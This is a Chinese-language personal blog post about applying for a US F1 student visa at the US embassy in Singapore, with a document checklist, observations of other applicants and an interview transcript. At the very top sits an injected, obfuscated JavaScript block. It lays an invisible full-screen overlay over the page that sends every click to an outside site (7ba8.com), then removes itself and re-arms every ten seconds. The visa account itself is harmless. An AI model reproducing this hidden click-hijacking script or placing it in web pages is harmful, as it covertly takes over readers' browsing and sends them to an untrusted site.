
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>先说一下准备吧,在新加坡签证的人不多,所以先在未明空间的Singapore版面精华区看了看,虽然文章老内容少,还是很有帮助,知道了都会有什么问题。很担心的问题有两个:一个是你不能说服我没有移民倾向,我死活就是不给你;一个是你和新加坡没什么牵连,这里不能给你签证,你要说回中国还是先回中国签证去吧,我不了解中国的情况。我觉得第一个问题,只要你考虑周全,讲述清楚,经得起质疑就好了。第二个问题让我感觉很棘手,说实在的,中国人在国内的关系是比这里多,将来毕业了最后回国内可能也大一些,但是也不排除以后会到新加坡啊,所以既然在新加坡签证就说回新加坡吧,至于理由要靠自己总结了。我的准备很充分,用了好几天得时间,材料也很全,除了要求的东西,还包括cover letter,还找一个大头头写了个support letter。 最后弄了一个checklist如下,自己看着清楚,别人如果用也方便:
1. Cover letter
2. Walk-in applicant checklist
3. Passport
4. Cashier's order for S$170
5. Confirmation Page for SEVIS fee
6. Offer letter
7. SEVIS-compliant I-20 Form
8. Signed EVAF DS-156 with photo
9. Completed form DS-157
10. Completed form DS-158
11. Completed Student Questionnaire
12. Resume
13. Undergraduate/Graduate Degrees and Transcripts
14. Photocopy of GRE score report
15. Photocopy of TOEFL score report
下面就是去签证了,不过要办学生签证,还要先在网上交个什么SEVIS FEE,100美元,好心疼自己的钱包,不停的被剥削,连个打折的余地都没有。这个SEVIS FEE在网上用信用卡交了就好,170新币的申请费去银行弄个什么Cashier's Order,DBS的手续费是5块,如美国使馆网页所说,在新加坡签证有三种方式,通过旅行社,邮寄或者自己去。我选择了自己去,省钱省时间。早上八点四十多到了美国使馆,外面排着一小队人,旁边一个人不停的喊签证的过去排队,美国公民直接进来,不知道去中国驻外使馆会不会也有这种优越感。第一个门检查了DS-156表格和银行开的申请费cashier's order,之后安全检查,包是可以带进去的,只要没有什么手机啊和不该带的东西,否则就要存在那里。然后走一个长廊,第二个安检什么也没管,这样就进了签证大厅,赶紧去了一个Queue Number,然后需要注意自己去签证的要先到Counter 2去交表和cashier's order,交过才能面试,之前就是你的Queue Number到了也别理会。东西交了之后就坐着等吧,人家要输入数据。整了下衣服,对着铁皮一看笑起来还是挺和蔼挺有信心的嘛。 等的时候就看了看形式,看上去签证的人都很顺利,没见到什么情绪激动的人,就是有几个印度人带着小孩去,小孩哇哇叫。非移民签证开了好几个窗口,其中4号窗口离我坐的很近,是一个年轻男子,签的速度比较快,嘴还挺贫的,感觉比较随和,有个欧美口音的人在他手下签了F1,然后我就重点观察了他,他先给了一个印尼妇女旅游签证。这个女的是个家庭主妇,有两个孩子,老公挣钱,她的姐姐在加州,邀请她去玩玩,费用她姐姐和她老公出,印尼妇女的英语还挺好的,在新加坡好像也呆了一二十年了,很顺利就过了。当时我就感觉4号挺不错。接下来4号就面试了一个马来女孩的F1,她爸妈也去了,不知道是不是想办旅游签证过去帮孩子安顿下来,女孩好像是去Berkeley,不少问题都父母帮她一起回答,说了一会儿,年轻男子就说你这种情况一般是要在马来西亚办,不是在新加坡,女孩说不知道这个事,然后父母就去解释什么,后来又说了不少,可惜听不到了,最后也不知道结果如何。看看大厅里面人差不多满了,Queue Number也都过百了,左右一看,还是颇有一些签F1的,其中看到一个SMA的印度师弟,不知道什么签证,从7号窗口过了,不过他头歪着说话,嘴巴朝上,要是我肯定把他据了,看上去太傲慢了。 这个时候一个光头冲到4号窗口了,他是办F1的,不过英语说的不够流利,原来是一个越南人,要去什么City College of San Fransisco,似乎是在新加坡学语言,然后去美国读本科。先问他为什么去,他说认识一个人在那里,那哥们说那里好。听他这么一说就替他遗憾不会中文,不上中国的BBS。然后他说自己读完了回越南,他姐姐有一个工厂,他回去可以做manager。当时签证厅很安静,签证官说你不能证明strong ties,我不能给你签证,你说的都是越南,我这里没法证明,你应该去越南签证。光头说自己还要在新加坡上课,所以不好回越南。签证官说你可以再花170新币来签证,但是我估计你还是拿不到。光头反驳说,我认识一个人就拿到签证了,答曰,每个人的情况是不一样的。这么个反面教材就在签证官啪啪盖戳之后离开了。这让我紧张了一下,害怕自己也被踢回国内签,那钱就浪费了啊,开始祈祷自己别在4号签证,看看7号窗口是个老年男子,心想还是跟他混吧,他老走来走去,所以看的清楚,其他的3号窗口和8号窗口也是非移民签证,但距离太远,看不到人。6号窗口是移民签证,是一个亚裔女士。 等了差不多一个小时,轮到我了,4号窗口。4号就4号吧,我想PR应该是不一样的,不至于像那个越南孩子,再说我准备的多充分啊,信心一定要有。然后开始面试了:
Visa Officer(VO)
ME: Nice to meet you, sir. Good morning.
VO: Good morning, may I know your name?
ME: SMRT. VO: Okay, can I have the queue number?
ME: Sure. VO: Let me have your fingerprint first. ME: Okay.
VO: Put on your second finger of left hand..index finger...good...then same th ing to the right hand...great
ME: (Press, Press)
VO: How long have you been here?
ME: Almost three years.
VO: Good, are you a PR?
ME: Yes.
VO: From what you filled in the form, you are not working.
ME: Right, I am not.
VO: Have you worked before in Singapore?
ME: Yes, I have worked as research assistant in the National University of Sin gapore.
VO: Have you received any certificate or studied before working in Singapore?
ME: Oh, yes, I got my master degree from the Singapore-MIT Alliance.
VO: So you have been to US before. ME: Right. I went to MIT in Boston.
VO: So you are going to study in ...(looking at DS-156)
ME: The *** University.
VO: ***, right, what are you going to study?
ME: Computer Science.
VO: Do you have any letter from the school? the offer letter with the financia l details? Can I see it? Me: Sure. There you go.
VO: So you are offered a scholarship. They pay everything for your eduction... Good.
ME: Right.
VO: why you choose *** University?
ME: Well, first of all, it is a famous university, one of the universities in Big Ten. More important, the engineering there is very good. It has a sepcial research center for Embedded System and Mobile Computing. Last but not least, they offered me scholarship.
VO: Hmm...that is a good reason. What will you work on your theis? What is you r research interest?
ME: Embedded System.
VO: such as firmware?
ME: Oh, no, I am working primarily on software side, not hardware side. I work on the compilers and program analysis...(introduce my research work)
VO: Gocha, what is your plan after getting PhD?
ME: I want to continue my research work in the research institutes or universi ties in Singapore. After staying in academia for a couple of years, I hope I c ould join the industry. As you can see, my research is more in the engineering side. So it is better to go to industry and put the technologies into good us es.
VO: Gocha, that is fair. well, I am going to approve your VISA. These document s I can give to you...these we will keep it. Please collect it around 2-3PM on May 26.
ME: No problem.
VO: I look forward to seeing you then. Have a nice day.
ME: Thank you. Have a nice day.
总的感觉F1签证无非是几个经典的问题,为什么去那个学校,研究什么的,学完了之后干什么。对我来说,我拿的是全奖,我去过美国,我是PR,我的打算说的是回新加坡,这是能够顺利签证的原因吧。不在中国签就不要提太多中国,省得被拒让你回中国,谁能知道五年后的事情呢。希望后来者也都顺利吧。材料方面我觉得Cover letter起到了作用,签证官确实仔细看了。support letter没用上,不过身上揣着,信心多一些。另外语言应该挺重要的,说得不好的还是多准备一下吧。Coverl letter的写法除了一般的客套格式就是回答美国使馆网页上的四个问题,摘抄在后面,第四个面试的时候就看出来了,主要讲前三个。我就不公布原文了,因为人都很懒,喜欢在别人的基础上改,可是万一被看出来差不多我就帮人变成害人了,多谢理解。 All student visa applicants must demonstrate that they: * are entering the United States for a temporary stay only for the purpose of pursuing a full course of study at a recognized institution of learning; * have a residence outside the United States to which they intend to return fo llowing their studies; * have sufficient resources available to provide for the total cost of their e ducation; and * have sufficient command of the English language or will enroll in intensive English language courses in the United States. 不能免俗,还是要谢谢一些人。到今天要谢的人太多,凡是关心过我的都一起谢谢吧。特别谢谢妈妈吧,昨天就她记着是我农历生日了,我自己也紧张的忘了。

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